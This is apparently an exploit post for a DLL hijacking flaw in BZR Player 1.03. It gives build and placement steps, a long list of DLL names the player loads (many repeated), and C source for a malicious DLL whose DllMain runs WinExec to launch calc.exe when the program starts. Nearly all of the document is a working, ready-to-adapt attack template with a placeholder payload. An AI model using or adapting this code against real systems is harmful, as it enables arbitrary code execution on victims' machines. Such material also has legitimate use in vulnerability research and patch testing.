BZR Player 1.03 DLL Hijacking

[Aerosol]

/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: BZR Player 1.03 DLL Hijacking
#[+] Date: 29-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://bzrplayer.blazer.nu/
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll  tcyber.c
# Copy it to the software dir. then execute the software , calc.exe will launch .
#Vulnerable and Exploitable DLLs:
output_dsound.dll
codec_cdda.dll
output_writer_nrt.dll
output_nosound.dll
output_nosound_nrt.dll
codec_tag.dll
codec_cdda.dll
codec_fsb.dll
codec_vag.dll
codec_.dll
codec_oggvorbis.dll
codec_tremor.dll
codec_fsb.dll
codec_aiff.dll
codec_flac.dll
codec_mod.dll
codec_s3m.dll
codec_xm.dll
codec_it.dll
codec_midi.dll
codec_dls.dll
codec_sf2.dll
codec_asf.dll
codec_vag.dll
codec_playlist.dll
codec_mpeg.dll
dsp_oscillator.dll
dsp_fft.dll
dsp_lowpass.dll
dsp_lowpass2.dll
dsp_lowpass_simple.dll
dsp_highpass.dll
dsp_echo.dll
dsp_delay.dll
codec_.dll
dsp_flange.dll
dsp_tremolo.dll
dsp_distortion.dll
dsp_normalize.dll
dsp_parameq.dll
dsp_pitchshift.dll
dsp_chorus.dll
dsp_reverb.dll
dsp_sfxreverb.dll
dsp_itecho.dll
codec_oggvorbis.dll
dsp_compressor.dll
dsp_dolbyheadphones.dll
output_dsound.dll
output_winmm.dll
output_wasapi.dll
output_asio.dll
output_writer.dll
output_writer_nrt.dll
output_nosound.dll
output_nosound_nrt.dll
codec_tremor.dll
codec_tag.dll
codec_cdda.dll
codec_fsb.dll
codec_vag.dll
codec_.dll
codec_oggvorbis.dll
codec_tremor.dll
codec_aiff.dll
codec_flac.dll
codec_mod.dll
codec_aiff.dll
codec_s3m.dll
codec_xm.dll
codec_it.dll
codec_midi.dll
codec_dls.dll
codec_sf2.dll
codec_asf.dll
codec_playlist.dll
codec_mpeg.dll
dsp_oscillator.dll
codec_flac.dll
dsp_fft.dll
dsp_lowpass.dll
dsp_lowpass2.dll
dsp_lowpass_simple.dll
dsp_highpass.dll
dsp_echo.dll
dsp_delay.dll
dsp_flange.dll
dsp_tremolo.dll
dsp_distortion.dll
codec_mod.dll
dsp_normalize.dll
dsp_parameq.dll
dsp_pitchshift.dll
dsp_chorus.dll
dsp_reverb.dll
dsp_sfxreverb.dll
dsp_itecho.dll
dsp_compressor.dll
dsp_dolbyheadphones.dll
output_dsound.dll
codec_s3m.dll
output_winmm.dll
output_wasapi.dll
output_asio.dll
output_writer.dll
output_writer_nrt.dll
output_nosound.dll
output_nosound_nrt.dll
codec_tag.dll
codec_cdda.dll
codec_fsb.dll
output_winmm.dll
codec_xm.dll
codec_vag.dll
codec_.dll
codec_oggvorbis.dll
codec_tremor.dll
codec_aiff.dll
codec_flac.dll
codec_mod.dll
codec_s3m.dll
codec_xm.dll
codec_it.dll
codec_it.dll
codec_midi.dll
codec_dls.dll
codec_sf2.dll
codec_asf.dll
codec_playlist.dll
codec_mpeg.dll
dsp_oscillator.dll
dsp_fft.dll
dsp_lowpass.dll
dsp_lowpass2.dll
codec_midi.dll
dsp_lowpass_simple.dll
dsp_highpass.dll
dsp_echo.dll
dsp_delay.dll
dsp_flange.dll
dsp_tremolo.dll
dsp_distortion.dll
dsp_normalize.dll
dsp_parameq.dll
dsp_pitchshift.dll
codec_dls.dll
dsp_chorus.dll
dsp_reverb.dll
dsp_sfxreverb.dll
dsp_itecho.dll
dsp_compressor.dll
dsp_dolbyheadphones.dll
codec_sf2.dll
codec_asf.dll
codec_playlist.dll
codec_mpeg.dll
dsp_oscillator.dll
dsp_fft.dll
output_wasapi.dll
dsp_lowpass.dll
dsp_lowpass2.dll
dsp_lowpass_simple.dll
dsp_highpass.dll
dsp_echo.dll
dsp_delay.dll
dsp_flange.dll
dsp_tremolo.dll
dsp_distortion.dll
dsp_normalize.dll
output_asio.dll
dsp_parameq.dll
dsp_pitchshift.dll
dsp_chorus.dll
dsp_reverb.dll
dsp_sfxreverb.dll
dsp_itecho.dll
dsp_compressor.dll
dsp_dolbyheadphones.dll
output_dsound.dll
output_winmm.dll
output_writer.dll
output_wasapi.dll
output_asio.dll
output_writer.dll
output_writer_nrt.dll
output_nosound.dll
output_nosound_nrt.dll
codec_tag.dll
codec_cdda.dll
codec_fsb.dll
codec_vag.dll
output_writer_nrt.dll
codec_.dll
codec_oggvorbis.dll
codec_tremor.dll
codec_aiff.dll
codec_flac.dll
codec_mod.dll
codec_s3m.dll
codec_xm.dll
codec_it.dll
codec_midi.dll
output_nosound.dll
codec_dls.dll
codec_sf2.dll
codec_asf.dll
codec_playlist.dll
codec_mpeg.dll
dsp_oscillator.dll
dsp_fft.dll
dsp_lowpass.dll
dsp_lowpass2.dll
dsp_lowpass_simple.dll
output_nosound_nrt.dll
dsp_highpass.dll
dsp_echo.dll
dsp_delay.dll
dsp_flange.dll
dsp_tremolo.dll
dsp_distortion.dll
dsp_normalize.dll
dsp_parameq.dll
dsp_pitchshift.dll
dsp_chorus.dll
codec_tag.dll
dsp_reverb.dll
dsp_sfxreverb.dll
dsp_itecho.dll
dsp_compressor.dll
dsp_dolbyheadphones.dll
output_dsound.dll
output_winmm.dll
output_wasapi.dll
output_asio.dll
output_writer.dll
#Proof of Concept (PoC):
=======================
*/

#include <windows.h>

int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}

Source